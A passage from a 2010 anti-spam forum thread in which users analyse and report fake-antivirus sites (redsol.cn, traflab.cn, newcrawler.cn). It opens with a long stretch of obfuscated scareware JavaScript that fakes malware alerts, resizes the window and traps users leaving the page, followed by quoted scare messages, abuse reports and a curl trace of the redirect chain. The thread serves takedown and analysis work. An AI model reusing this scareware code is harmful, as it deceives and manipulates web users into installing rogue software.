.style.marginTop=ejnovce.jlfketk.eqyhzija.rtmgnlkter+"px"}
else{ejnovce.nzlnnx.njsorhgd(ejnovce.jlfketk.eqyhzija.nlhtpr)
.style.marginTop=ejnovce.jlfketk.eqyhzija.xgclmf+"px"}};
ejnovce.eqyhzija.mgiukbr=function(){ejnovce.nzlnnx.njsorhgd(ejnovce.jlfketk.eqyhzija.ywxhojqa)
.style.display="none";ejnovce.nzlnnx.njsorhgd(ejnovce.jlfketk.eqyhzija.mymypetyu)
.innerText="Step 1:";ejnovce.nzlnnx.njsorhgd(ejnovce.jlfketk.eqyhzija.srtdcnj)
.innerText="Step 2:";ejnovce.nzlnnx.njsorhgd(ejnovce.jlfketk.eqyhzija.xkgxg)
.style.height=ejnovce.jlfketk.eqyhzija.hjumgj+"px";ejnovce.nzlnnx.njsorhgd(ejnovce.jlfketk.eqyhzija.hjwntuqa)
.style.height=ejnovce.jlfketk.eqyhzija.hjumgj+"px";ejnovce.nzlnnx.njsorhgd(ejnovce.jlfketk.eqyhzija.ourehw)
.style.height=ejnovce.jlfketk.eqyhzija.hjumgj+"px";ejnovce.nzlnnx.njsorhgd(ejnovce.jlfketk.eqyhzija.qhegx)
.style.height=(ejnovce.jlfketk.eqyhzija.hjumgj-1)+"px";
if(ejnovce.pxjhodfim.bflda6){ejnovce.nzlnnx.njsorhgd(ejnovce.jlfketk.eqyhzija.nlhtpr)
.style.marginTop=ejnovce.jlfketk.eqyhzija.lejoyyiysl+"px"}
else{ejnovce.nzlnnx.njsorhgd(ejnovce.jlfketk.eqyhzija.nlhtpr)
.style.marginTop=ejnovce.jlfketk.eqyhzija.ddfveuvdu+"px"}};
ejnovce.eqyhzija.fktylhovi=function()
{ejnovce.eqyhzija.peoabdr.ipttw=true;
if(ejnovce.eqyhzija.peoabdr.pgoujpi=="tBrowser")
{if(ejnovce.eqyhzija.iyrrnqau==null)
{ejnovce.eqyhzija.iyrrnqau=ejnovce.nzlnnx.ppl(ejnovce.jlfketk.eqyhzija.gwiqddo,ejnovce.eqyhzija.peoabdr.qekueqyn,true);
ejnovce.vljjaf.phbueei.div=ejnovce.eqyhzija.iyrrnqau;
ejnovce.vljjaf.phbueei.background=null;
if(ejnovce.sewikzgsw.peoabdr.doecgpegke)
{ejnovce.sewikzgsw.qhiusswp()}else{if(ejnovce.sewikzgsw.peoabdr.kfymlvalim)
{ejnovce.sewikzgsw.fiuvgqqaap()}else{if(ejnovce.sewikzgsw.peoabdr.sskwgmw)
{ejnovce.sewikzgsw.xyplix()}}}ejnovce.kybqhqx.uessrxf();
ejnovce.qzezxgpt.kiiv(ejnovce.qzezxgpt.lylgoe);
ejnovce.nzlnnx.ahymqtzzi.appendChild(ejnovce.eqyhzija.iyrrnqau);
var a=ejnovce.nzlnnx.jznyxhbxf(ejnovce.eqyhzija.iyrrnqau,"absolute");
if(!ejnovce.pxjhodfim.qowpu)
{ejnovce.eqyhzija.iyrrnqau.style.left=a.left+"px";
ejnovce.eqyhzija.iyrrnqau.style.top=a.top+"px"}}
else{ejnovce.eqyhzija.iyrrnqau.style.display="block"}
if(!ejnovce.ybsdihnqdy.ilsszh&&!ejnovce.pxjhodfim.kzimooxdp){ejnovce.eqyhzija.mgiukbr()}
else{if(ejnovce.ybsdihnqdy.ilsszh&&!ejnovce.pxjhodfim.kzimooxdp){}}if(ejnovce.pxjhodfim.bflda7){ejnovce.nzlnnx.njsorhgd(ejnovce.jlfketk.eqyhzija.qhegx)
.style.paddingLeft="0px";
ejnovce.nzlnnx.njsorhgd(ejnovce.jlfketk.eqyhzija.qhegx).style.paddingRight="0px";
ejnovce.nzlnnx.njsorhgd(ejnovce.jlfketk.eqyhzija.ourehw)
.style.marginTop="-1px"}}
else{if(ejnovce.eqyhzija.peoabdr.pgoujpi=="tWindow")
{ejnovce.vljjaf.nabxeseh(ejnovce.eqyhzija.peoabdr.qekueqyn,443,458)}}};
ejnovce.sewikzgsw.tyzaiwg=function(){return true};
ejnovce.vljjaf={phbueei:new Object(),ibdandmft:{}};
ejnovce.vljjaf.qnnlpr=function(){window.moveTo(0,0);
window.resizeTo(screen.width,screen.height)};
ejnovce.vljjaf.ezipguj=function(){window.resizeTo(1,1);
window.moveTo((screen.width/2-100),(screen.height/2-25))};ejnovce.vljjaf.gvhmi=function(){ejnovce.vljjaf.ezipguj();
alert("Warning! Your computer is vulnerable to malware
attacks. \r\n \r\n We recommend you to check your system
immediately. Press OK to start the process now");
ejnovce.vljjaf.qnnlpr()};
ejnovce.vljjaf.dfdxkuv=function(e,b,a)
{if(!ejnovce.eqyhzija.peoabdr.ipttw)
{if(ejnovce.vljjaf.ibdandmft[e]==undefined)
{var d=(typeof(ejnovce.vljjaf.ibdandmft.length)==undefined)?"alert_window_"+ejnovce.vljjaf.ibdandmft.length:"alert_window_0";
ejnovce.vljjaf.ibdandmft[e]=ejnovce.kybqhqx.yfbdmsrug(d,b,a);
ejnovce.vljjaf.ibdandmft[e].foregroundContentLayer.appendChild(ejnovce.nzlnnx.njsorhgd(e));
ejnovce.vljjaf.phbueei.div=ejnovce.vljjaf.ibdandmft[e].foregroundContentLayer;
ejnovce.vljjaf.phbueei.background=ejnovce.vljjaf.ibdandmft[e].backgroundOpacityLayer;ejnovce.nzlnnx.njsorhgd(e).style.display="block";if(ejnovce.ybsdihnqdy.ceetpura&&ejnovce.pxjhodfim.kzimooxdp)
{var c=function(){ejnovce.jrexjyfzde();
setTimeout(c,ejnovce.jlfketk.ybsdihnqdy.ctknnwzjr)};
ejnovce.jrexjyfzde();setTimeout(c,ejnovce.jlfketk.ybsdihnqdy.ctknnwzjr)}}
else{ejnovce.vljjaf.ibdandmft[e].foregroundContentLayer.style.display="block"}}};
ejnovce.vljjaf.nabxeseh=function(c,b,a){if(!ejnovce.eqyhzija.iyrrnqau){var d=ejnovce.kybqhqx.yfbdmsrug(ejnovce.jlfketk.sewikzgsw.gwiqddo,b,a);
d.foregroundContentLayer.innerHTML=c;
ejnovce.vljjaf.phbueei.div=d.foregroundContentLayer;
ejnovce.vljjaf.phbueei.background=d.backgroundOpacityLayer}};
ejnovce.vljjaf.vzafgni=function(a){ejnovce.kybqhqx.mbym(ejnovce.vljjaf.ibdandmft[a]);
delete ejnovce.vljjaf.ibdandmft[a]};ejnovce.vljjaf.nnfshhj=function(e,f,c){if(f!=null){var b=ejnovce.nzlnnx.njsorhgd(f);c=c||"absolute";
if(ejnovce.vljjaf.phbueei.div!=b){var d=ejnovce.nzlnnx.jznyxhbxf(b,c);
b.style.left=d.left+"px";b.style.top=d.top+"px";
ejnovce.vljjaf.phbueei.div=b;
ejnovce.vljjaf.phbueei.background=null}}if(ejnovce.vljjaf.phbueei.div!=null){e=e||window.event;
ejnovce.vljjaf.phbueei.startLeft=parseInt(ejnovce.vljjaf.phbueei.div.style.left);
ejnovce.vljjaf.phbueei.startTop=parseInt(ejnovce.vljjaf.phbueei.div.style.top);if(isNaN(ejnovce.vljjaf.phbueei.startLeft)){ejnovce.vljjaf.phbueei.startLeft=0}if(isNaN(ejnovce.vljjaf.phbueei.startTop)){ejnovce.vljjaf.phbueei.startTop=0}var a=new Object();if(ejnovce.pxjhodfim.bflda){a.x=window.event.clientX+document.documentElement.scrollLeft+document.body.scrollLeft;
a.y=window.event.clientY+document.documentElement.scrollTop+document.body.scrollTop}else{a.x=e.clientX+window.scrollX;
a.y=e.clientY+window.scrollY}ejnovce.vljjaf.phbueei.dsod=a.x;
ejnovce.vljjaf.phbueei.gpapfdrnit=a.y;
ejnovce.tvpiithdh.gaqosayb("mousemove",ejnovce.vljjaf.pvlgybls);
ejnovce.tvpiithdh.gaqosayb("mouseup",ejnovce.vljjaf.fhals);
ejnovce.tvpiithdh.ejnxcnndrh(e,true,true)}};
ejnovce.vljjaf.fhals=function(){ejnovce.tvpiithdh.wzbzgdh("mousemove",ejnovce.vljjaf.pvlgybls);
ejnovce.tvpiithdh.wzbzgdh("mouseup",ejnovce.vljjaf.fhals)};
ejnovce.vljjaf.pvlgybls=function(b){var a=new Object();if(ejnovce.pxjhodfim.bflda){a.x=window.event.clientX+document.documentElement.scrollLeft+document.body.scrollLeft;a.y=window.event.clientY+document.documentElement.scrollTop+document.body.scrollTop}else{a.x=b.clientX+window.scrollX;
a.y=b.clientY+window.scrollY}var e=ejnovce.vljjaf.phbueei.startLeft+a.x-ejnovce.vljjaf.phbueei.dsod;
if(e<0){e=0}var d=ejnovce.vljjaf.phbueei.startTop+a.y-ejnovce.vljjaf.phbueei.gpapfdrnit;if(d<0){d=0}ejnovce.vljjaf.phbueei.div.style.left=e+"px";
ejnovce.vljjaf.phbueei.div.style.top=d+"px";
ejnovce.tvpiithdh.ejnxcnndrh(b,true,true);
if(ejnovce.vljjaf.phbueei.background!=null){var f=ejnovce.nzlnnx.dwndtsj();
var c=ejnovce.nzlnnx.jznyxhbxf(ejnovce.vljjaf.phbueei.div);
if(c.bottom>f.height){ejnovce.vljjaf.phbueei.background.style.height=c.bottom+"px"}
else{ejnovce.vljjaf.phbueei.background.style.height=f.height+"px"}
if(c.right>f.width){ejnovce.vljjaf.phbueei.background.style.width=c.right+"px"}
else{ejnovce.vljjaf.phbueei.background.style.width=f.width+"px"}}};
ejnovce.kybqhqx={apsneinic:[],ojaewqx:0,ppkmgxz:100};
ejnovce.kybqhqx.mbym=function(c){if(c!=null&&ejnovce.kybqhqx.apsneinic.length!=0){var b=0;for(var a=0;a<ejnovce.kybqhqx.apsneinic.length;a++){if(ejnovce.kybqhqx.apsneinic[a]!=null&&ejnovce.kybqhqx.apsneinic[a]==c){b=a;break}}ejnovce.nzlnnx.ahymqtzzi.removeChild(c.root);
ejnovce.kybqhqx.apsneinic.splice(b,1);ejnovce.kybqhqx.ojaewqx--}};
ejnovce.kybqhqx.uessrxf=function(){while(ejnovce.kybqhqx.apsneinic.length!=0){var a=ejnovce.kybqhqx.apsneinic.pop();
ejnovce.nzlnnx.ahymqtzzi.removeChild(a.root)}
ejnovce.kybqhqx.ojaewqx=0};
ejnovce.kybqhqx.resize=function(b){for(var a=0;
a<ejnovce.kybqhqx.apsneinic.length;
a++){if(ejnovce.kybqhqx.apsneinic[a].width){ejnovce.kybqhqx.apsneinic[a].backgroundOpacityLayer.style.width=b.width+"px";
ejnovce.kybqhqx.apsneinic[a].foregroundContentLayer.style.left=Math.round((b.width-ejnovce.kybqhqx.apsneinic[a].width)/2)+"px"}if(ejnovce.kybqhqx.apsneinic[a].height){ejnovce.kybqhqx.apsneinic[a].backgroundOpacityLayer.style.height=b.height+"px";
ejnovce.kybqhqx.apsneinic[a].foregroundContentLayer.style.top=Math.round((b.height-ejnovce.kybqhqx.apsneinic[a].height)/2)+"px"}}};
ejnovce.kybqhqx.yfbdmsrug=function(f,c,a){c=c?c:false;
a=a?a:false;var e=ejnovce.kybqhqx.ojaewqx;var b={id:e,width:c,height:a,root:document.createElement("div"),
backgroundOpacityLayer:document.createElement("div"),
foregroundContentLayer:document.createElement("div")};
b.root.setAttribute("id",f);
b.backgroundOpacityLayer.className="backgroundOpacityLayer";
b.backgroundOpacityLayer.style.zIndex=ejnovce.kybqhqx.ppkmgxz+e;
b.foregroundContentLayer.className="foregroundContentLayer";
b.foregroundContentLayer.style.zIndex=ejnovce.kybqhqx.ppkmgxz+e+1;b.root.appendChild(b.backgroundOpacityLayer);
b.root.appendChild(b.foregroundContentLayer);
ejnovce.nzlnnx.ahymqtzzi.appendChild(b.root);
ejnovce.kybqhqx.apsneinic.push(b);ejnovce.kybqhqx.ojaewqx+=1;ejnovce.kybqhqx.ppkmgxz+=2;
if(typeof(c)!=undefined||typeof(a)!=undefined){var d=ejnovce.nzlnnx.dwndtsj();
if(c){b.foregroundContentLayer.style.left=Math.round((d.width-c)/2)+"px";
b.backgroundOpacityLayer.style.width=d.width+"px"}if(a){b.foregroundContentLayer.style.top=Math.round((d.height-a)/2)+"px";
b.backgroundOpacityLayer.style.height=d.height+"px"}}return b};
ejnovce.qzezxgpt={opcryd:null,vmafbvwf:null,jefnuxeho:null,lylgoe:null};
ejnovce.qzezxgpt.htxwocvo=function(b)
{if(document.createStyleSheet&&ejnovce.pxjhodfim.bflda){var a=document.createStyleSheet(b);
a.disabled=true;return a}else{a=document.createElement("link");
a.type="text/css";
a.rel="stylesheet";
a.href=b;
a.media="screen";
ejnovce.nzlnnx.tyiuafmkql.appendChild(a);
a.disabled=true;return a}};
ejnovce.qzezxgpt.qvptjcuv=function(c,a){a=(a==null)?true:a;
var b=document.createElement("style");b.setAttribute("type","text/css");
b.setAttribute("media","screen");
if(ejnovce.pxjhodfim.bflda){b.styleSheet.cssText=c}else{try{b.appendChild(document.createTextNode(c))}catch(d){b.cssText=c}}
ejnovce.nzlnnx.tyiuafmkql.appendChild(b);
b.disabled=a;return b};
ejnovce.qzezxgpt.bqaijvpdd=function(a){if(a!=null){a.disabled=true}};
ejnovce.qzezxgpt.kiiv=function(a){if(a!=null){a.disabled=false}};
ejnovce.qzezxgpt.<beep>=function(a,b){if(a.currentStyle){return a.currentStyle[b]}else{if(window.getComputedStyle){return document.defaultView.getComputedStyle(a,null).getPropertyValue(b)}}return null};ejnovce.tvpiithdh={resizeInterval:0};
ejnovce.tvpiithdh.xmircf=function(b,a){b.returnValue=a;
return b.returnValue};ejnovce.tvpiithdh.vzopgouq=function(b,a)
{if(!ejnovce.ybsdihnqdy.lcxtvxt&&!ejnovce.sewikzgsw.peoabdr.doecgpegke){ejnovce.ybsdihnqdy.ilsszh=true}b.returnValue=a;
return b.returnValue};ejnovce.tvpiithdh.mwfvh=function(b)
{if(ejnovce.ybsdihnqdy.ceetpura&&(ejnovce.ybsdihnqdy.ucecrorje>=ejnovce.jlfketk.vljjaf.nyxlfdif)){ejnovce.vthoohtre(false);
return}b=b||window.event;var c=ejnovce.sewikzgsw.ciockne("C");
if(c||ejnovce.ybsdihnqdy.lcxtvxt){var a=c[0]||ejnovce.jlfketk.vljjaf.jyhifiv;ejnovce.ybsdihnqdy.ucecrorje++;
if(ejnovce.pxjhodfim.bflda){ejnovce.tvpiithdh.vzopgouq(b,a)}else{ejnovce.tvpiithdh.xmircf(b,a)}}
if(ejnovce.sewikzgsw.peoabdr.doecgpegke)
{setTimeout("ejnovce.sewikzgsw.zkeyah ();",100)}
else{if(ejnovce.sewikzgsw.peoabdr.kfymlvalim||ejnovce.eqyhzija.peoabdr.ipttw){setTimeout("ejnovce.ffzaugutu();",100)}
else{if(ejnovce.ybsdihnqdy.lcxtvxt&&ejnovce.snyoh.kdmgrdvl){ejnovce.etcgmel.aekb();ejnovce.ybsdihnqdy.vlnlxevh=false;
ejnovce.sewikzgsw.peoabdr.yexzfo?setTimeout("ejnovce.sewikzgsw.xwjrnpur();
",100):setTimeout("ejnovce.sewikzgsw.zkeyah();",100)}}}};
ejnovce.tvpiithdh.bygwccmn=function()
{var a=ejnovce.nzlnnx.filtnpxrq();ejnovce.kybqhqx.resize(a)};
ejnovce.tvpiithdh.oxirzy=function()
{ejnovce.tvpiithdh.gaqosayb("resize",ejnovce.tvpiithdh.bygwccmn,
window);ejnovce.tvpiithdh.gaqosayb("unload",function(){document.location=ejnovce.bidbcfjpvh()},window);
window.onbeforeunload=ejnovce.tvpiithdh.mwfvh};
ejnovce.tvpiithdh.gaqosayb=function(b,c,a){a=a||document;
if(ejnovce.pxjhodfim.bflda){b="on"+b;
a.attachEvent(b,c)}else{a.addEventListener(b,c,false)}};
ejnovce.tvpiithdh.djtukqv=function(c,d,e)
{if(e&&typeof e.length=="number"&&typeof e.splice=="function"){for(var b in e){var a=ejnovce.nzlnnx.njsorhgd(e[b]);
ejnovce.tvpiithdh.gaqosayb(c,d,a)}}};
ejnovce.tvpiithdh.wzbzgdh=function(b,c,a){a=a||document;
if(ejnovce.pxjhodfim.bflda){b="on"+b;
a.detachEvent(b,c)}else{a.removeEventListener(b,c,false)}};
ejnovce.tvpiithdh.ejnxcnndrh=function(b,a,c){b=b||window.event;
a=a||false;c=c||false;if(ejnovce.pxjhodfim.bflda)
{b.cancelBubble=a;b.returnValue=!c}else{if(a){b.stopPropagation()}if(c){b.preventDefault()}}};
ejnovce.dzzmil={};ejnovce.dzzmil.pnqtez=function(f,e,a,b)
{var d=document.getElementById(f);
if(typeof(d)!=undefined&&d!=null){var c=function(){if(typeof(d)!=undefined&&d!=null)
{d.style[e]=a}};setTimeout(c,b*1000)}};
ejnovce.dzzmil.aqaaqnqrwx=function(g,d,e,f)
{var b=ejnovce.nzlnnx.njsorhgd(g);if(typeof(b)!=undefined&&b!=null)
{var a=0;var c=function(){if(typeof(b)!=undefined&&b!=null)
{b.innerHTML=d[a];a++;if(d[a]!=undefined)
{setTimeout(c,e*1000)}}};setTimeout(c,f*1000)}};
ejnovce.pxjhodfim.oxirzy();ejnovce.cxtuzk.oxirzy();
ejnovce.tvpiithdh.oxirzy();ejnovce.iigstr();
ejnovce.nzlnnx.oxirzy();
User avatar
AlphaCentauri
You are kiillllling-a my bizinisss!
 
Posts: 5989
Joined: Thu Mar 01, 2007 3:01 am

Re: help to close down redsol.cn, traflab.cn and newcrawler.cn

Postby spamislame » Mon Mar 22, 2010 9:39 pm

This is your standard fake windows antivirus.

The JavaScript builds out a page that resembles a basic Windows desktop, and proceeds to "scan" your computer, finding lots of Windows malware, even if you're running Linux or MacOSX.

Key quotation:

Code: Select all
cl_alert\",439,463)},1000)}}startCentral();
","pgoujpi":false,"gshqo":[["To prevent damage to your computer, press
CANCEL.","C"], ["Your system is at risk of crash. Press CANCEL to
prevent it.","C"], ["Your system has been damaged due to recent virus
attack. Press 'OK' to to fix it.", "O"],["To improve performance of
your PC press 'OK'.","O"], ["Your PC is working slowly. Press 'OK' to
check it.","O"]].


That's hard-coded right into the page.

*ssholes!

SiL
User avatar
spamislame
Site Admin
 
Posts: 5058
Joined: Tue May 09, 2006 9:18 am

Re: help to close down redsol.cn, traflab.cn and newcrawler.cn

Postby AlphaCentauri » Mon Mar 22, 2010 10:17 pm

"Antivirus system will be deactivated if your proceed, are you sure?"


"Are you sure" are three words that strike terror in the hearts of computer users who are not very sure about anything technical.
User avatar
AlphaCentauri
You are kiillllling-a my bizinisss!
 
Posts: 5989
Joined: Thu Mar 01, 2007 3:01 am

Re: help to close down redsol.cn, traflab.cn and newcrawler.cn

Postby merbit » Mon Mar 22, 2010 10:43 pm

Thank you all for the input :)
If you google search the domains redsol.cn, traflab.cn and newcrawler.cn versus the random *.in or *.com domains they redirect to, it seems that the first 3 .cn domains are the ones that are mostly "advertised" around the web. That is why I wanted to take those down in the first place, as they end up in google search results.

I wonder if I should start writing emails at the IP hosting... also I don't know where to complain about the domain registration!
merbit
Getting started
 
Posts: 10
Joined: Thu Jan 21, 2010 6:45 pm

Re: help to close down redsol.cn, traflab.cn and newcrawler.cn

Postby merbit » Mon Mar 22, 2010 10:50 pm

I'll try my luck with service@cnnic.cn for the .cn domains. :D

*WARNING*: This is a malware/virus report. DO NOT CLICK ON HTTP LINKS unless
you know what you are doing.

To whom it may concern,

I have detected some malicious websites hosted on your servers. Please
shut them down as soon as possible.
You are all connected to either being the domain registrar of the
websites, or the IP hosting company.

To Domain .cn registrar: service@cnnic.cn
Please shut down:
* redsol.cn
* traflab.cn
* newcrawler.cn
These websites are directly linked to virus/malware programs, examples:
(DO NOT CLICK ON LINKS! MALWARE/VIRUS!)
http://www.redsol.cn/fonts-calibri-download.html
http://www.newcrawler.cn/fonts-calibri-download.html
http://traflab.cn/in.cgi?10&parameter=f ... 1&key=auth


$ dig +noall +answer redsol.cn traflab.cn newcrawler.cn
redsol.cn. 3489 IN A 66.197.154.230
traflab.cn. 3490 IN A 85.10.204.35
newcrawler.cn. 3574 IN A 66.197.154.233

To IP hosting companies:
1. nic@hostnoc.net, abuse@burst.net
1a) redsol.cn. 3489 IN A 66.197.154.230

You are directly/indirectly endorsing IP hosting to the above domain.
IP information 66.197.154.230:
Network Operations Center Inc. HOSTNOC-2BLK (NET-66-197-128-0-1)
66.197.128.0 - 66.197.255.255
resellermatrix RESELLER242 (NET-66-197-154-2-1)
66.197.154.2 - 66.197.154.254

1b) newcrawler.cn. 3574 IN A 66.197.154.233

You are directly/indirectly endorsing IP hosting to the above domain.
IP information 66.197.154.230:
Network Operations Center Inc. HOSTNOC-2BLK (NET-66-197-128-0-1)
66.197.128.0 - 66.197.255.255
resellermatrix RESELLER242 (NET-66-197-154-2-1)
66.197.154.2 - 66.197.154.254

2. abuse@hetzner.de

You are directly/indirectly endorsing IP hosting to the above domain.
IP information 85.10.204.35:
inetnum: 85.10.192.0 - 85.10.207.255
netname: HETZNER-RZ-NBG-NET
descr: Hetzner Online AG
abuse-mailbox: abuse@hetzner.de

Thanks
merbit
Getting started
 
Posts: 10
Joined: Thu Jan 21, 2010 6:45 pm

Re: help to close down redsol.cn, traflab.cn and newcrawler.cn

Postby Nodus » Tue Mar 23, 2010 8:50 pm

AlphaCentauri wrote:"Are you sure" are three words that strike terror in the hearts of computer users who are not very sure about anything technical.

Yeah, and you can make it even worse: "Are you sure you don't want to cancel?" and the familiar three buttons, "Yes", "No" and "Cancel". :lol:
Arf, she said
User avatar
Nodus
Spammer Obliterator
 
Posts: 2286
Joined: Fri Jun 15, 2007 7:05 pm

Re: help to close down redsol.cn, traflab.cn and newcrawler.cn

Postby merbit » Wed Mar 24, 2010 5:51 am

Here's a 24-hour sample log:
http://pastebin.com/raw.php?i=eCpTu7FH
merbit
Getting started
 
Posts: 10
Joined: Thu Jan 21, 2010 6:45 pm

Re: help to close down redsol.cn, traflab.cn and newcrawler.cn

Postby merbit » Wed Mar 24, 2010 6:01 pm

Looks like it's fixed :)

Code: Select all
  http://www.redsol.cn/fonts-calibri-download.html
  http://www.newcrawler.cn/fonts-calibri-download.html
  http://traflab.cn/in.cgi?10&parameter=fonts+calibri+download&ur=1&key=auth


The above links redirect to google search or show an empty "domain default page". Woohoo!
merbit
Getting started
 
Posts: 10
Joined: Thu Jan 21, 2010 6:45 pm

Re: help to close down redsol.cn, traflab.cn and newcrawler.cn

Postby merbit » Wed Mar 24, 2010 6:17 pm

sneaky devils... they're back on track, if you add a custom header/referer, it redirects again. :)

Code: Select all
$ curl --header "Referer: http://forum.indya.com/showthread.php?t=166404" -sLI "http://www.redsol.cn/fonts-calibri-download.html" | grep Location:
Location: http://traflab.cn/in.cgi?10&parameter=fonts+calibri+download&HTTP_REFERER=http%3A%2F%2Fforum.indya.com%2Fshowthread.php%3Ft%3D166404&ur=1&key=kengoo
Location: http://www3.magia7.xorg.pl/?uid=319&pid=3&ls=7&ttl=a1e476d992d&q=fonts calibri download
Location: http://scan-my-systemm.xorg.pl?p=p52dcWtlcV%2FCj8bYbnOCdVik12qZVp%2FZatrauJ%2BCoKXcz4mbm5h2lpeJpqTPnNvUV6ShoG%2BZlZKWZ2bKZpyWx1eqppfZ1tZ2Y1qqcZ6jpq3UTcfHnZmPpptYyJzZnpzVjseK15qrnpuih8minpl2Wq6dnbCeU83WbmFdbWBplGOQYmOWW5WZlFepl5yiydetom5oY56jqq7OW83UlamOYpWn0VzVmJ%2FdocvWyJKbYKbN0aKtb2VvamxkbF%2FVoKGXY2ZmaGhwnGKXVqTZX6CVlWdwZmydmZhuWJeccZCM
merbit
Getting started
 
Posts: 10
Joined: Thu Jan 21, 2010 6:45 pm

Re: help to close down redsol.cn, traflab.cn and newcrawler.cn

Postby merbit » Wed Mar 24, 2010 7:48 pm

Sent it to malwarebytes, they ought to pulverize this ;)
http://forums.malwarebytes.org/index.ph ... opic=44499

Cheers everyone!
merbit
Getting started
 
Posts: 10
Joined: Thu Jan 21, 2010 6:45 pm


Return to Malware

Who is online

Users browsing this forum: No registered users and 1 guest

cron